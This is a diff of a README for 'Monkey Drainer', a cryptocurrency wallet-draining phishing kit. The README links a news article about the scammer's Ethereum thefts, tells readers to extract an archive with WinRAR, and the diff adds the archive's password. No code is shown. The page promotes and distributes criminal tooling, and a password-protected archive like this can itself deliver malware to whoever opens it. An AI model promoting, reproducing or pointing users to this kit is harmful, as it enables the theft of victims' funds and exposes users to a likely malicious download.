Monkey-Drainer/Monkey-Drainer/README.md

  ### 📩**Click here [cointelegraph](https://cointelegraph.com/news/phishing-scammer-monkey-drainer-has-pilfered-as-much-as-1m-in-ethereum) to read the artical about monkey drainer on cointelegraph.**
 ---
 ## 🔥 How to setup ?
-extract the file with winrar and read the guide inside the folder.
+Extract the file with winrar and read the guide inside the folder 🔑 Pass- fU%Lw!@Monkey-s60G

 ### <center>❄️ Monkey Drainer™
 ![Preview](https://cdn.discordapp.com/attachments/1011077087630741647/1063552459986964500/ssnsn.png)